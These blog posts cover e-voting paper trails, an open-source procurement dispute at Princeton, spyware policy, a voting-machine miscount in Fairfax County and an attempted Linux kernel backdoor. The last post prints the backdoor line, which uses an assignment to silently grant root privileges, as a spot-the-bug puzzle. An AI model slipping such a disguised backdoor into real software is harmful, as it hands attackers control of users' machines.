Research and commentary on digital technologies in public life
California Secretary of State Kevin Shelley will announce today that as of 2006, all e-voting machines in the state must provide a voter-verifiable paper trail, according to an L.A. Times story by Allison Hoffman and Tim Reiterman.
This is yet another sign that the push for sensible e-voting safeguards is gaining momentum.
[Link credit: Siva Vaidhyanathan at Sivacracy.net.]
The Office of Information Technology (OIT) here at Princeton has taken the unusual step of issuing a statement distancing itself from the views expressed by one of its employees, Howard Strauss, in a column in Syllabus magazine.
(OIT operates the campus network and other shared computing facilities. It is not to be confused with the Computer Science Department, which is the main site of information technology teaching and research at Princeton.)
Mr. Strauss’s column, which really has to be read to be believed, likens open source products to fraudulent Nigerian spam emails.
Fortunately the grownups in charge at OIT responded by reiterating the university’s non-Straussian procurement policy, which is based not on a rigid pro- or anti-open source rule but instead involves – listen carefully, ’cause this might be hard to follow – looking at all of the available products and choosing the best one for the job.
The Center for Democracy and Technology has issued a sensible and accessible paper about the spyware problem and associated policy issues.
Spyware is software, installed on your computer without your consent, that gathers information about what you do on your computer. It’s shockingly common – if you are a typical active web surfer using Internet Explorer in its default configuration, and you haven’t been taking specific steps to protect yourself against spyware, then you probably have several spyware programs on your computer right now.
CDT recommends that end users protect themselves by using anti-spyware tools such as AdAware, Spybot Search and Destroy, Spyware Eliminator, or BPS Spyware/Adware Remover. (I have had good luck with Spybot Search and Destroy.)
At the policy level, CDT is lukewarm about attempts to ban spyware specifically, because of the difficult line-drawing exercise involved in distinguishing spyware from certain types of legitimate programs. They argue instead for policies that address the underlying problems: installation without consent, and surreptitious monitoring of user behavior.
Kudos to CDT for advancing the policy discussion on this often overlooked issue.
Opponents of unauditable e-voting technology often talk about the threat of fraud. They worry that somebody will compromise a voting machine or will corrupt the machines’ software, to steal an election. We should worry about fraud. But just as important, and more likely, is the possibility that software bugs will cause a miscount that gives an election to the wrong candidate.
This may be what happened two weeks ago in a school board race in Fairfax County, Virginia. David Cho at the Washington Post reports :
School Board member Rita S. Thompson (R), who lost a close race to retain her at-large seat, said yesterday that the new computers might have taken votes from her. Voters in three precincts reported that when they attempted to vote for her, the machines initially displayed an “x” next to her name but then, after a few seconds, the “x” disappeared.
In response to Thompson’s complaints, county officials tested one of the machines in question yesterday and discovered that it seemed to subtract a vote for Thompson in about “one out of a hundred tries,” said Margaret K. Luca, secretary of the county Board of Elections.
“It’s hard not to think that I have been robbed,” said Thompson, whose 77,796 recorded votes left her 1,662 shy of reelection. She is considering her next step, and said she was wary of challenging the election results: “I’m not sure the county as a whole is up for that. I’m not sure I’m up for that.”
And how do we know the cause was a bug, rather than fraud? Because the error was visible to voters. If this had been fraud, the “X” on the screen would never have disappeared – but the vote would have been given, silently, to the wrong candidate.
You could hardly construct a better textbook illustration of the importance of having a voter-verifiable paper trail. The paper trail would have helped voters notice the disappearance of their votes, and it would have provided a reliable record to consult in a later recount. As it is, we’ll never know who really won the election.
Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.
The malicious code snippet was small but it was constructed cleverly, so that most programmers would miss the problem on casual reading of the code.
This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open-source argue that the open development process makes it easier for a badguy to inject malicious code. Fans of open-source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source devleopers did read the code and spot the problem.
What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.
[Technogeek readers: The offending code is below. Can you spot the problem?
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
]
